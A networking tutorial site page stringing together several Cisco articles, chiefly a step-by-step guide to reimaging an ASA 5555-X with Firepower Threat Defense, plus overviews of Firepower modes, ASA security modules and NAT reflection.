The command reveals that the backplane power consumption is approximately 40 Watts followed by a detailed report of the installed modules. In our example, you can see the two Supervisor engines in slot 3 & 4, followed by the 48 Gigabit Ethernet module in slot 5. The command also shows the Supervisor engines' configured redundany operating mode and status. Lastly, any system failures are reported at the end - this output shows that we've got a problem with one of the power supplies, but rest assured, we had simply switched it off to see if it was going to show up in the report!

Summary

This article covered the initial installation and setup of a new Cisco Catalyst 4507R-E switch, populated with two Supervisor Engines II-Plus and a 48 port Gigabit module with PoE support. We saw areas of the switch which you won't easily find elsewhere and our generous amount of pictures made sure you understood what the 4507R-E looks like, inside and out! Lastly, we saw the switch bootup procedure and Supervisor engine POST test and syncronization process.

  • Hits: 91764
Converting Cisco Firepower from Platform mode to Appliance mode

Converting Cisco Firepower from Platform mode to Appliance mode. Full ASA Backup with ASDM

cisco firepower platform to appliance mode conversionThis article explains how to configure a Cisco Firepower 2100 series device to operate in Appliance mode. We’ll show you how to switch from Platform mode to Appliance mode and how the device will automatically convert and retain your ASA configuration.

Before performing the conversion, its important to obtain a full backup of the Firepower system and therefore also cover how to backup your Cisco Firepower appliance configuration, certificates, VPN configuration (including pre-shared keys), VPN profiles and more, using the  Cisco Adaptive Security Device Manager (ASDM)

Key Topics:

More in-depth technical articles can be found in our Cisco Firewall section.

Cisco Firepower Platform and Appliance Mode

The Cisco Firepower 2100 series operates on an underlying system called FXOS. You can run the Firepower 2100 for ASA in two modes:

  • Platform Mode: In this mode, you need to configure basic operating parameters and hardware interface settings within FXOS. This includes tasks like enabling interfaces, setting up EtherChannels, managing NTP, and handling image management. You can use either the chassis manager web interface or the FXOS CLI for these configurations. Afterward, you can set up your security policy in the ASA operating system using ASDM or the ASA CLI.
  • Appliance Mode (Default): This mode allows you to configure all settings directly in the ASA. Only advanced troubleshooting commands are available through the FXOS CLI in this mode. Appliance mode is similar to how the old ASA Firewalls (5500 series) ran when the FXOS didn’t exist.

The Management 1/1 interface is used to manage the Firepower device. The interface is configured with two IP addresses, one for the FXOS and one for the ASA. When changing to Appliance mode, the FXOS IP address is lost and will need to be reconfigured, however you can connect to the FXOS directly from the ASA software using the following command:

Firepower, Cisco, ASDM, Platform mode, Appliance mode, Backup, ASA Firewall, FXOS

Continue reading

  • Hits: 3669

Cisco ASA Firepower Threat Defense (FTD): Download and Installation/Setup ASA 5500-X. FTD Management Options

One Appliance – One Image is what Cisco is targeting for its Next Generation Firewalls. With this vision, Cisco has created a unified software image named “Cisco Firepower Threat Defense”.  In this FirePOWER series article we’ll cover the installation of Firepower Threat Defense (FTD) on a Cisco ASA 5500-X series security appliance. We’ll also explain the management options available: Firepower Management Center (FMC) which is the old FireSIGHT and Firepower Device Manager (FDM).

Cisco Firepower Threat Defense (FTD) is a unified software image, which is a combination of Cisco ASA and Cisco FirePOWER services features that can be deployed on Cisco Firepower 4100 and the Firepower 9300 Series appliances as well as on the ASA 5506-X,ASA 5506H-X, ASA 5506W-X, ASA 5508-XASA 5512-X, ASA 5515-X, ASA 5516-X, ASA 5525-X, ASA 5545-X, and ASA 5555-X. However, at the time of writing, the Cisco Firepower Threat Defense (FTD) unified software cannot be deployed on Cisco ASA 5505 and 5585-X Series appliances. 

Understanding Cisco Firepower Threat Defense Management & Capabilities

Simplifying management and operation of Cisco’s Next Generation Firewalls is one of the primary reasons Cisco is moving to a unified image across its firewall appliances.

Currently the Firepower Threat Defense can be managed through the Firepower Device Management (similar to Cisco’s ASDM) and Firepower Management Center (analyzed below).

Managing Options for FirePOWER Services and Firepower Threat Defense (FTD)

Managing Options for FirePOWER Services and Firepower Threat Defense (FTD)

It should be noted that the Firepower Device Management software is under extensive development and is not currently capable of supporting all configuration options. For this reason it’s best to rely on the Firepower Management Center to manage the Cisco Firepower Threat Defense system.

The Firepower Management Center, also known as FMC or FireSIGHT, is available as a dedicated server or virtual image appliance (Linux based VM server) that connects to the FirePOWER or Firepower Threat Defense and allows you to fully manage either system. Organizations with multiple Firepower Threat Defense systems or FirePOWER Services would register and manage them from the FMC.

Alternatively, users can manage the Firepower Threat Defense (FTD) device using the Firepower Device Manager (FDM) – the concept is similar to ASDM.

Currently the latestCisco Firepower Threat Defense (FTD) unified software image available is version 6.2.x .

The Cisco Firepower Threat Defense is continually expanding the Next-Generation Firewall Servicesit supports which currently includes:

  • Stateful Firewall Capabilities
  • Static and Dynamic Routing. Supports RIP, OSPF, BGP, Static Routing
  • Next-Generation Intrusion Prevention Systems (NGIPS)
  • URL Filtering
  • Application Visibility and Control (AVC)
  • Advance Malware Protection (AMP)
  • Cisco Identity Service Engine (Cisco ISE) Integration
  • SSL Decryption
  • Captive Portal (Guest Web Portal)
  • Multi-Domain Management
  • Rate Limiting
  • Tunnelled Traffic Policies
  • Site-to-Site VPN. Only supports Site-to-Site VPN between FTD appliances and FTD to ASA
  • Multicast Routing Shared NAT
  • Limited Configuration Migration (ASA to Firepower TD)

While the Cisco Firepower Threat Defense is being actively developed and populated with some great features, we feel that it’s too early to place it in a production environment. There are some stability issues, at least with the FTD image on the ASA platform, which should be ironed out with the newer software releases.

If you are already in the process of installing FTD on your ASA then you should heavily test it before rolling it out to production.

Due to the issues encountered, we were forced to remove the FTD installation by reimaging our ASA 5555-X Appliance with Cisco ASA and FirePOWER Services images. We believe the “Cisco Firepower Threat Defense” unified software image is very promising but requires some more time to reach a more mature and stable version.

Problems/Limitations Encountered With Cisco Firepower Threat Defense

While small deployments might be able to overcome the absence of many desired features (e.g IPSec VPN support), enterprise environments will certainly find it more challenging.

Depending on the environment and installation requirements customers will stumble into different limitations or issues. For example, on our ASA 5555-X we had major delays trying to push new policies from the Firepower Management Centre (FMC) to the newly imaged FTD ASA. With a total of just 5 policies implemented it took over 2 minutes to deploy them from the FMC to the FTD.

We also found that we were unable to configure any EtherChannel interfaces. This is considered a major drawback especially for organizations with multiple DMZ zones and high-bandwidth traffic requirements. Cisco has an official announcement for this right here.

In addition to the above, when we completed the conversion of our ASA to the FTD software we needed to open a TAC Service Request in order to get transfer our ASA License to the FTD image, adding additional unnecessary overhead and confusion. We believe this should have been automatically done during the installation process.

Cisco ASA Firepower Threat Defense (FTD) Installation – Quick Overview

Reimaging the Cisco ASA 5555-X Appliance to install the Cisco Firepower Threat Defense image is fairly simple once you understand what needs to be done. Here are the steps in the order they must be executed:

Download the Cisco Firepower Threat Defense Boot & System Image

Using a valid CCO account that has the necessary software download privileges visit: Downloads Home>Products Security>Firewalls>Next-Generation Firewalls (NGFW)>ASA 5500-X with FirePOWER Services and select Firepower Threat Defense Software:

Downloading Cisco ASA 55xx Firepower Threat Defense software

Downloading Cisco ASA 55xx Firepower Threat Defense software

Alternatively click on the following URL: Firepower Threat Defense Software Download

Next, select and download the latest boot image and system version. In our example this isversion 6.2.0:

Downloading the latest Firepower Threat Defense System and Boot Image

Downloading the latest Firepower Threat Defense System and Boot Image

Reboot ASA, Break The Startup/Boot Sequence

When ready reboot the ASA appliance. During the boot process hit Break or Esc to interrupt boot:

It is strongly recommended you have a complete backup of your ASA Configuration and software before proceeding with the next steps which will erase the configuration and all files

Rebooting... Cisco BIOS Version:9B2C109A
Build Date:05/15/2013 16:34:44
CPU Type: Intel(R) Xeon(R) CPU X3460 @ 2.80GHz, 2793 MHz
Total Memory:16384 MB(DDR3 1333)
System memory:619 KB, Extended Memory:3573 MB
……. <output omitted>
Booting from ROMMON
Cisco Systems ROMMON Version (2.1(9)8) #1: Wed Oct 26 17:14:40 PDT 2011
Platform ASA 5555-X with SW, 8 GE Data, 1 GE Mgmt
Use BREAK or ESC to interrupt boot.
Use SPACE to begin boot immediately.
Boot in 10 seconds.

Boot interrupted.
Management0/0
Link is DOWN
MAC Address: 00f6.63da.e807
Use ? for help.
rommon #1>

At this point we have successfully interrupted the boot process and can proceed to the next step. 

Upload the Boot Image and Boot the ASA Firewall

We now need to configure the necessary parameters on the ASA Firewall to download the Cisco Firepower Threat Defence Boot Image. Ensure you have an FTP/TFTP server installed and configured to allow the Firewall to download the image/system files.

Now connect to the ASA console port using a terminal access application, e.g. Putty, configured with the following serial port settings:

  • 9600 baud
  • 8 data bits
  • No parity
  • 1 stop bit
  • No flow control

Ensure the Cisco ASA 5500-X appliance is running rommon version v1.1.8 or greater by using an IOS command show module to ensure re-immaging will be successful. If the rommon version is earlier than v1.1.8 then the ASA Appliance needs a rommon upgrade

ciscoasa# show module
.. output omitted…
Mod    MAC Address Range                Hw Version     Fw Version     Sw Version
---- --------------------------------- ------------ ------------ ---------------
1       7426.aceb.ccea to 7426.aceb.ccf2    0.3          1.1.8           9.6(1)
sfr     7426.aceb.cce9 to 7426.aceb.cce9    N/A         N/A

Next, configure the ASA Firewall with the necessary network settings/variables so it can access the image and system files previously downloaded. ASA 5555-X firewall uses a built-in management interface, hence no need to specify the management interface.

rommon #1> address 10.32.4.129
rommon #2> server 10.32.4.150
rommon #3> gateway 10.32.4.150
rommon #4> file ftd-boot-9.7.1.0.cdisk
rommon #5> set
ROMMON Variable Settings:
 ADDRESS=10.32.4.129
 SERVER=10.32.4.150
 GATEWAY=10.32.4.150
 PORT=Management0/0
 VLAN=untagged
 IMAGE=ftd-boot-9.7.1.0.cdisk
 CONFIG=
 LINKTIMEOUT=20
 PKTTIMEOUT=4
 RETRY=20

Explanation of commands:

- Address: IP address of ASA Firewall
- Server: The TFTP server from where the ASA will download the image
- Gateway: The IP address of the network gateway. Mandatory even if the TFTP server is within the same logical network
- File : The name of the file
- Set: Shows the rommon settings

The Sync command will save the NVRAM parameters, effectively “enabling” the configuration changes. It’s advisable to try and ping the TFTP server. This will not only confirm the TFTP server is reachable but also populate the ARP table of the ASA Firewall:

rommon #6> sync
Updating NVRAM Parameters...

rommon #7> ping 10.32.4.150
Sending 20, 100-byte ICMP Echoes to 10.32.4.150, timeout is 4 seconds:
?!!!!!!!!!!!!!!!!!!!
Success rate is 95 percent (19/20)

When ready, issue the tftpdnld command to initiate the download of the boot image to the ASA Firewall. Once downloaded the system will automatically boot the image file:

rommon #7> tftpdnld
ROMMON Variable Settings:
ADDRESS=10.32.4.129
SERVER=10.32.4.150
GATEWAY=10.32.4.150
PORT=Management0/0
VLAN=untagged
IMAGE=ftd-boot-9.7.1.0.cdisk
CONFIG=
LINKTIMEOUT=20
PKTTIMEOUT=4
RETRY=20

tftp This email address is being protected from spambots. You need JavaScript enabled to view it. via 10.32.4.150
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Received 107292672 bytes

Launching TFTP Image...

Execute image at 0x14000

Cisco Security Appliance admin loader (3.0) #0: Mon Jan 16 09:01:33 PST 2017
Platform ASA5555

Loading...
IO memory blocks requested from bigphys 32bit: 125055
INIT: version 2.88 booting

Starting udev
Configuring network interfaces... done.
Populating dev cache
Found device serial number FCH2023J78M.
Found USB flash drive /dev/sdc
Found hard drive(s): /dev/sda /dev/sdb
fsck from util-linux 2.23.2
dosfsck 2.11, 12 Mar 2005, FAT32, LFN
There are differences between boot sector and its backup.
Differences: (offset:original/backup)
65:01/00
Not automatically fixing this.
/dev/sdc1: 62 files, 825465/2011044 clusters
Launching boot CLI ...
Configuring network interface using DHCP
Bringing up network interface.
Depending on your network, this might take a couple of minutes when using DHCP...
ifup: interface lo already configured
Using IPv6 address: fe80::2f6:63ff:feda:e807
IPv4 address not assigned. Run 'setup' before installation.
INIT: SwitchingStarting system message bus: dbus.
Starting OpenBSD Secure Shell server: sshd
generating ssh RSA key...
generating ssh ECDSA key...
generating ssh DSA key...
Could not load host key: /etc/ssh/ssh_host_ed25519_key
done.
Starting Advanced Configuration and Power Interface daemon: acpid.
acpid: starting up
acpid: 1 rule loaded
acpid: waiting for events: event logging is off

Starting ntpd: done
Starting syslog-ng:[2017-03-16T04:08:41.437297] Connection failed; fd='15', server='AF_INET(127.128.254.1:514)', local='AF_INET(0.0.0.0:0)', error='Network is unreachable (101)'
[2017-03-16T04:08:41.437321] Initiating connection failed, reconnecting; time_reopen='60'
.
Starting crond: OK

      Cisco FTD Boot 6.0.0 (9.7.1.)
      Type ? for list of commands
FIREWALLCX-boot>

Optionally you can ping the tftp/ftp server to confirm there is still connectivity with the server:

FIREWALLCX-boot> ping 10.32.4.150
PING 10.32.4.150 (10.32.4.150) 56(84) bytes of data.
64 bytes from 10.32.4.150: icmp_seq=1 ttl=128 time=0.722 ms
64 bytes from 10.32.4.150: icmp_seq=2 ttl=128 time=0.648 ms
64 bytes from 10.32.4.150: icmp_seq=2 ttl=128 time=0.856 ms
--- 10.32.4.150 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2018ms
rtt min/avg/max/mdev = 0.648/0.742/0.856/0.086 ms

Install Firepower Threat Defense System Software 

At this point our Firewall has successfully downloaded and booted the Boot image and is ready to accept the System image. At the prompt type setup and simply follow the bouncing ball. The setup process will gather important configuration parameters for the FTD device such as Hostname, IP address, Subnet mask, Gateway, DNS servers and more

Many of the configuration questions involve a yes/no answer. The default value that will be selected when leaving the parameter blank and hitting enter is marked in square brackets [ ]:

FIREWALLCX-boot> setup

                      Welcome to Cisco FTD Setup
                      [hit Ctrl-C to abort]
                      Default values are inside []

Enter a hostname [FIREWALLCX]: FIREWALLCXFTD
Do you want to configure IPv4 address on management interface?(y/n) [Y]: y
Do you want to enable DHCP for IPv4 address assignment on management interface?(y/n) [Y]: n
Enter an IPv4 address: 10.32.4.129
Enter the netmask: 255.255.255.0
Enter the gateway: 10.32.4.150
Do you want to configure static IPv6 address on management interface?(y/n) [N]: n
Stateless autoconfiguration will be enabled for IPv6 addresses
Enter the primary DNS server IP address: 10.32.4.150
Do you want to configure Secondary DNS Server? (y/n) [n]: n
Do you want to configure Local Domain Name? (y/n) [n]: y
Enter the local domain name: firewall.cx
Do you want to configure Search domains? (y/n) [n]: n
Do you want to enable the NTP service? [Y]: n
Please review the final configuration:

Hostname:                             FIREWALLCXFTD
Management Interface Configuration

IPv4 Configuration:                 static
           IP Address:                 10.32.4.129
           Netmask:                    255.255.255.0
           Gateway:                    10.32.4.150

IPv6 Configuration:                 Stateless autoconfiguration
DNS Configuration:
           Domain:                      firewall.cx
           DNS Server:                10.32.4.150

NTP configuration:                   Disable

CAUTION:
You have selected IPv6 stateless autoconfiguration, which assigns a global address
based on network prefix and a device identifier. Although this address is unlikely
to change, if it does change, the system will stop functioning correctly.
We suggest you use static addressing instead.

Apply the changes?(y,n) [Y]: Y
Configuration saved successfully!
Applying...
Restarting network services...
Done.
Press ENTER to continue...

At this point the appliance’s initial configuration phase is complete and ready to begin downloading the FTD system image

To initiate the image download use the system install ftp://10.32.4.150/ftd-6.2.0-362.pkg and replace the IP address portion with your FTP server’s IP address.

During the installation, the process will ask for the necessary credentials to authenticate to the FTP server. Right before the point of no return the system will ask for a final confirmation before erasing the appliance’s disk and initiating the upgrade. When the system image installation is complete, the system will require the user to hit enter to reboot.

Unnecessary output e.g. dots (….) have been removed from the log to make it easier to read and understand.

FIREWALLCX-boot> system install ftp://10.32.4.150/ftd-6.2.0-362.pkg

######################## WARNING ############################
# The content of disk0: will be erased during installation! #
#############################################################

Do you want to continue? [y/N]: y
Erasing disk0 ...
Extracting ...
Verifying. …

Enter credentials to authenticate with ftp server
Username: firewallcx
Password: $etmeup!
Verifying. ... ...
Downloading. … ...
Extracting. … …

Package Detail
           Description:                  Cisco ASA-FTD 6.2.0-362 System Install
           Requires reboot:           Yes

Do you want to continue with upgrade? [y]: y
Warning: Please do not interrupt the process or turn off the system.
Doing so might leave system in unusable state.

Starting upgrade process .... ….. ….
Populating new system image. ….. ….

Reboot is required to complete the upgrade. Press 'Enter' to reboot the system.

Broadcast message from root@FIREWALLCXFTD (ttyS0) (Thu Mar 16 05:46:03 2017):
The system is going down for reboot NOW!

The ASA FTD Appliance will now reboot. While this process is underway you will see a lot of information during shutdown and startup. When booting into the FTD system image for the first time it is normal to see a number of error/warning messages – do not be alarmed.

When the system has successfully booted it will require you to login using the default username (admin) & password (cisco123) then require you to press Enter to present Cisco’s EULA which must be accepted at the end by pressing again the enter key or typing YES:

Cisco ASA5555-X Threat Defense v6.2.0 (build 362)
firepower login: admin
Password: cisco123
You must accept the EULA to continue.
Press <ENTER> to display the EULA:
END USER LICENSE AGREEMENT
IMPORTANT: PLEASE READ THIS END USER LICENSE AGREEMENT CAREFULLY.
……………………………………..
Product warranty terms and other information applicable to Cisco products are
available at the following URL: http://www.cisco.com/go/warranty.

Please enter 'YES' or press <ENTER> to AGREE to the EULA: YES

Finally the last step involves changing the default admin password and configuring again the system’s network settings.

While it might seem repetitive and pointless to configure the network settings three times during the FTD boot image and system image installation, this allows companies to perform these necessary preparation tasks in an isolated environment, e.g. lab room, to get the device ready for the final deployment that will be in the production environment.

Similar to the previous steps, pressing enter will accept the default value shown between the brackets [ ]:

System initialization in progress. Please stand by.
You must change the password for 'admin' to continue.
Enter new password: $etmeup!
Confirm new password: $etmeup!
You must configure the network to continue.
You must configure at least one of IPv4 or IPv6.
Do you want to configure IPv4? (y/n) [y]: y
Do you want to configure IPv6? (y/n) [n]: n
Configure IPv4 via DHCP or manually? (dhcp/manual) [manual]: manual
Enter an IPv4 address for the management interface [192.168.45.45]: [enter]
Enter an IPv4 netmask for the management interface [255.255.255.0]: [enter]
Enter the IPv4 default gateway for the management interface [data-interfaces]: [enter]
Enter a fully qualified hostname for this system [firepower]: firewall.cx
Enter a comma-separated list of DNS servers or 'none' [208.67.222.222,208.67.220.220]: [enter]
Enter a comma-separated list of search domains or 'none' []:[enter]
If your networking information has changed, you will need to reconnect.

DHCP server is enabled with pool: 192.168.45.46-192.168.45.254. You may disable with configure network ipv4 dhcp-server-disable For HTTP Proxy configuration, run 'configure network http-proxy'

Manage the device locally? (yes/no) [yes]: yes
Configuring firewall mode to router Update policy deployment information - add device configuration Successfully performed firstboot initial configuration steps for Firepower Device Manager for Firepower Threat Defense.
>

The greater-than “>” symbol indicates the FTD setup is complete and running.

More information on the Cisco Firepower Threat Defense, including Installation and Upgrade Guides, can be found at the following Cisco URL:

https://www.cisco.com/c/en/us/support/security/firepower-ngfw/products-installation-guides-list.html

You can now log into the Cisco Firepower Device Manager by entering the ASA Firewall appliance IP address in your web browser:

Cisco Firepower Device Manager Login Screen

Cisco Firepower Device Manager Login Screen

Once logged in, you can follow the step-by-step setup Device Setup Wizard that will take you the necessary steps to initially configure your new ASA FTD device:

Device Setup Page of Cisco FTD

Device Setup Page of Cisco FTD 

Experienced Firepower Threat Defense users can click on the Skip device setup link located on the lower area of the screen.

Summary

Cisco’s Firepower ThreatDefense(FTD) istheNext-Generation Firewall solution that will eventually replace the well-known ASA software. While FTD is still in its early years it is rapidly being adopted by organizations across the globe. It is important to understand the current limitations of FTD before moving it into a production environment. For example, important features such as site-to-site VPN are not currently supported, however, it does have a great clean and intuitive GUI interface!

For many, installing Cisco’s Firepower Threat Defense on an ASA Firewall appliance can be a confusing task. Our Cisco Firepower Threat Defense (FTD) installation guide has been designed to simplify the process by providing step-by-step instructions presented in an easy-to-understand format while also covering Cisco Firepower Threat Defense management options.

  • Hits: 128551

Cisco ASA 5500-X Series Firewall with IPS, ASA CX & FirePower Services. Application Visibility and Control (AVC), Web Security, Botnet Filtering & IPS / IDS, Firepower Threat Defense

cisco-asa-firewall-5500-x-series-ips-context-aware-firepower-firesight-services-1The Cisco ASA Firewall 5500-X series has evolved from the previous ASA 5500 Firewall series, designed to protect mission critical corporate networks and data centers from today’s advanced security threats.

Through sophisticated software and hardware options (modules), the ASA’s 5500-X series Firewalls support a number of greatly advanced next-generation security features that sets them apart.These include:

  • Cisco Intrusion Prevention System (IPS) services. A signature based IPS solution offered as a software or hardware module depending on the ASA 5500-X appliance model.
  • Cisco ASA CX Context-aware services. A software module for ASA 5500-X appliances except the ASA 5585-X where it’s offered as a hardware module. Provides IPS services, Application Visibility and Control (AVC), web security and botnet filtering.
  • Cisco FirePOWER Services. Cisco’s latest software & hardware threat protection, superseding previous technologies by combining IPS and CX services plus full contextual awareness of users, infrastructure, applications and content, URL filtering with advanced malware protection (AMP). Offered as a software module for 5500-X series appliances except the 5585-X, which requires a dedicated hardware module. Note that FirePOWER services run in parallel with the classical ASA software.
  • Cisco Firepower Threat Defense (FTD). This is the next step after the FirePOWER services which was released by Cisco in 2015.  While FirePOWER services run alongside with the classical Cisco ASA software, the newer Firepower Threat Defence combines the Cisco ASA Software + FirePOWER services in one software package. This is also the concept of the newer Firepower appliances (e.g 4100 & 9000 series) which run Firepower Threat Defense software. At this point, Firepower Threat Defence is under continious development but does not still support many features offered by the classical ASA software. For example at the time of writing site-to-site IP Sec VPN is still not available.

Our previous article examined Cisco’s ASA 5500 series Firewall hardware modules, which include the Content Security CSC-SSM & Intrusion Prevention System (IPS) / Intrusion Detection System (IDS) AIP-SCC / AIP-SSM modules. While these solutions are no longer sold by Cisco, they have been widely deployed in data centers and corporate networks around the world and will be supported by Cisco until 2018.

Note: To download datasheets containing technical specifications and features offered by the Cisco 5500-X Series Firewalls with FirePOWER, IPS and CX Context-aware services, visit our Cisco ASA 5500 & 5500-X Series Adaptive Security Appliances Download Section.

Since Cisco’s announcement back in 2013 regarding the discontinuation of its ASA 5500 series firewall appliances in favour of the newer 5500-X Next Generation Firewalls, customers have been contemplating when to upgrade to the newer 5500-X series. Given the fact that Cisco is no longer providing major firmware upgrades to the older ASA 5500 series and the appearance of new advanced security threats and malware (e.g ransomware), it is now considered imperative to upgrade to the newer platform so that security is maintained at the highest possible level.

Customers seeking advanced protection are likely to consider expanding their ASA Firewall capabilities with the purchase of an IPS module, CX Context-aware or FirePOWER services.

cisco-asa-firewall-5500-x-series-ips-context-aware-firepower-firesight-services-2

Figure 1. The Cisco FirePOWER hardware module for the ASA-5585-X Firewall

Cisco’s FirePOWER advanced security threat protection solution was introduced late 2014 and its purpose is to replace the current ASA 5500-X IPS and ASA CX 5500-X Context-aware offerings.

The diagram below shows key security features provided by most Cisco ASA Firewall appliances. Features such as Clustering, High Availability, Network profiling, Identity-Policy Control, VPN and advanced access lists have until today been fairly standard offerings across the ASA Firewall series, however, the newer 5500-X can now offer the additional FirePOWER services marked in red below:

cisco-asa-firewall-5500-x-series-ips-context-aware-firepower-firesight-services-3

Figure 2. Cisco FirePOWER services (marked in red) provide advanced key security features to ASA Firewalls

Cisco’s FirePOWER solution has the ability not only to provide advanced zero-day IPS threat protection, but also to deliver exceptional security & firewalling services such as Application Visibility & Control, FirePower Analytics & Automation, Advanced Malware Protection (AMP) & Sandboxing, plus Web-based URL filtering, all in one box.

While most of these additional FirePOWER services are subscription based, meaning companies will need to fork out additional money, they do offer significant protection and control and help to reduce administrative complexity.

Customers utilizing Cisco’s Intrusion Prevention System (IPS) or FirePOWER services also have the option of the Cisco FireSIGHT Management Center – a solution used to centrally manage network security. Cisco’s FireSIGHT allows network administrators, security engineers and IT Managers to monitor events, analyse incidents, obtain detailed reporting and much more, from a single intuitive web-interface.

cisco-asa-firewall-5500-x-series-ips-context-aware-firepower-firesight-services-4 Figure 3. The Cisco FireSIGHT Management Center Graphical Interface

It’s evident that Cisco is marketing its ASA 5500-X series with FirePOWER services as its flagship network security & threat protection solution, which is why Firewall.cx will be covering the Cisco FirePOWER & FireSIGHT Management Center configuration in great depth in upcoming articles.

  • Hits: 36343

Cisco ASA 5500 Series Firewall Modules & Cards – Content Security (CSC-SSM), IPS - IDS (AIP SCC & AIP SSM) Hardware Modules

cisco-asa-firewall-5500-series-ips-ids-content-filtering-antimalware-hardware-modules-1Cisco’s Adaptive Security Appliance (ASA) Firewalls are one of the most popular and proven security solutions in the industry. Since the introduction of the PIX and ASA Firewall into the market, Cisco has been continuously expanding its firewall security features and intrusion detection/prevention capabilities to adapt to the evolving security threats while integrating with other mission-critical technologies to protect corporate networks and data centers.

In recent years, we’ve seen Cisco tightly integrate separate security technologies such as Intrusion Prevention Systems (IPS) and Intrusion Detection Systems (IDS) within the ASA Firewall appliances in the form of hardware module add-ons (older 5500 series & newer 5500-X series) and, recently, software modules supported only by the newer ASA 5500-X series security appliances.

With the addition of the software or hardware module, customers are able to increase the firewall’s security and protection capabilities while at the same time simplifing security management and administration by dealing with a single firewall device instead of multiple firewall, IPS or IDS devices.

While this article covers the hardware modules available for the Cisco ASA 5500 Firewall series, upcoming articles will cover both software and hardware modules along with Cisco FirePOWER & FireSIGHT management services for the newer ASA 5500-X series.

Note: The Cisco ASA 5500 series hardware modules for ASA-5505, ASA 5510, ASA 5520 & ASA 5540 have been announced as End-of-Sale & End-of-Life. Modules below are no longer sold or supported by Cisco. Last day of support was 30th of September 2018.

Users interested in the newer ASA 5500-X IPS, Context-Aware and FirePOWER services can read our article Cisco ASA 5500-X Series Firewall with IPS, ASA CX & FirePower Services. Application Visibility and Control (AVC), Web Security, Botnet Filtering & IPS / IDS.

Hardware Modules For ASA 5500 Series Firewalls

The ASA 5500 series Firewalls (ASA-5505, ASA 5510, ASA 5520, ASA 5540 etc) were the first security appliances with the capability to integrate hardware modules for enhanced security and threat protection.

To help target different markets and security requirements, Cisco split its hardware module offerings into two distinct categories:

  • Content Security and Control Security Services (CSC-SSM)
  • Advanced Inspection and Prevention Security Services (AIP-SCC & AIP-SSM)

Each hardware module card is equipped with its own CPU, RAM and Flash storage space, running a separate operating system that integrates with the ASA Firewall via its internal network ports.

Let’s take a brief look at each category.

The Content Security & Control Security Services Modules

The Content Security and Control Security Services module aims to cover corporate environments where comprehensive malware, advanced content filtering (including Web Caching, URL filtering, anti-phishing), and anti-spam filtering is required. This all-in-one hardware module solution is capable of providing a wealth of security and control capabilities essential for all size networks.

Following are the hardware modules supporting Content Security and Control Security Services:

  • CSC-SSM-10: For ASA 5510 & ASA 5520. Initial support for 50 users, upgradable up to 500 users
  • CSC-SSM-20: For ASA 5510, ASA 5520 & ASA 5540. Initial support for 500 users, upgradable up to 1000 users

The CSC-SSM-10 & CSC-SSM-20 modules look identical. Shown below is the CSC-SSM-20 module:

Figure 1. The Cisco CSC-SSM-20 hardware module for the ASA 5500 series Firewalls

Users requiring additional information on the Cisco CSC-SSM modules, including features, hardware specifications, licenses, and support contracts (Smartnet), can download the Cisco ASA 5500 Series Content Security and Control Security Services datasheet from our Cisco ASA 5500 Product Datasheets and Guides download section.

The Advanced Inspection & Prevention Security Services Modules

The Advanced Inspection and Prevention Security Services modules combine IPS and IDS threat protection with mitigation services aiming to protect and stop malicious traffic before it can affect the network. Updates for the modules occur up to every 5 minutes, ensuring real-time updates and effective protection from zero-day attacks.

Cisco ASA Firewall customers can choose between the following Advanced Inspection and Prevention Security Service modules depending on their ASA hardware platform:

  • AIP SCC-5:For ASA 5505. 1 Virtual sensor. 75Mbps concurrent threat mitigation throughput.
  • AIP SSM-10: For ASA 5510 & ASA 5520. 4 Virtual sensors. Up to 225Mbps concurrent threat mitigation throughput depending on ASA model.
  • AIP SSM-20: For ASA 5520 & ASA 5540. 4 Virtual sensors. Up to 500Mbps concurrent threat mitigation throughput depending on ASA model.
  • AIP SSM-40: For ASA 5520 & ASA 5540. 4 Virtual sensors. Up to 650Mbps concurrent threat mitigation throughput depending on ASA model.

Figure 2. The Cisco ASA Firewall AIP SSC-5, AIP SSM-20 and AIP SSM40 IPS hardware modules

Users requiring additional information on the Cisco AIP SSC-5 & AIP-SSM modules, including features, hardware specifications, licenses, and support contracts (Smartnet), can download the Cisco ASA 5500 Series Advanced Inspection and Prevention Security Services module and card datasheet from our Cisco ASA 5500 Product Datasheets and Guides download section.

Summary

The ASA 5500 Firewall series hardware modules offer a substantial number of network security enhancements making them ideal for corporate environments with sensitive data, in-house webservers and multiple VLANs & VPN networks. Their ability to provide advanced malware threat protection, URL filtering and IPS / IDS services make them the ideal upgrade for any ASA 5500 series Firewall adding true value to protecting and mitigating security threats.

  • Hits: 27871

Understand & Configure NAT Reflection, NAT Loopback, Hairpinning on Cisco ASA 5500-X for TelePresence ExpressWay and Other Applications

This article examines the concept of NAT Reflection, also known as NAT Loopback or Hairpinning, and shows how to configure a Cisco ASA Firewall running ASA version 8.2 and earlier plus ASA version 8.3 and later, to support NAT Reflection. NAT Reflection, is a NAT technique used when devices on the internal network (LAN) need to access a server located in a DMZ zone using its public IP address.

What’s interesting is that NAT Reflection is not supported by all firewall appliances, however Cisco ASA Firewalls provide 100% support, making any NAT scenario possible. NAT Reflection is also seen at implementations of Cisco’s Telepresence systems where the ExpressWay-C server on the internal network needs to communicate with the ExpressWay-E server in the DMZ zone using its public IP address.

Note: Users seeking additional information on Network Address Translation concepts can visit our dedicated NAT Section that covers NAT in great depth.

Single 3-Port/Leg Firewall DMZ With One LAN Interface ExpressWay-E Server

In the example below, ExpressWay-C with IP address 192.168.1.50 needs to access ExpressWay-E (DMZ zone, IP address 192.168.5.5) using its public IP address of 203.40.40.5. This type of setup also happens to be one of the two most popular configurations:

NAT Reflection on a 3-Port ASA Firewall with Cisco Telepresence (ExpressWay-C & ExpressWay-E)

Figure 1. NAT Reflection on a 3-Port ASA Firewall with Cisco Telepresence (ExpressWay-C & ExpressWay-E)

ExpressWay-C packets traversing the ASA Firewall destined to ExpressWay-E’s public IP address will have the following transformation thanks to the NAT Reflection configuration:

  • Destination IP address 203.40.40.5 is replaced with Destination IP address 192.168.5.5ExpressWay-E’s private IP address. This is also known as Destination NAT (DNAT).
  • The Source IP address 192.168.1.50 (ExpressWay-C) is replaced with Source IP address 192.168.5.1 – ASA’s DMZ interface IP address. This is also known as Source NAT (SNAT).

When ExpressWay-C packets arrive to the ExpressWay-E server, they will have the following source & destination IP address: Source IP: 192.168.5.1, Destination IP: 192.168.5.5

Translation of the source IP address (SNAT) of packets (192.168.1.50 to 192.168.5.1) for this traffic flow is optional however required specifically for the Cisco ExpressWay setup. The configuration commands for the above setup is as follows:

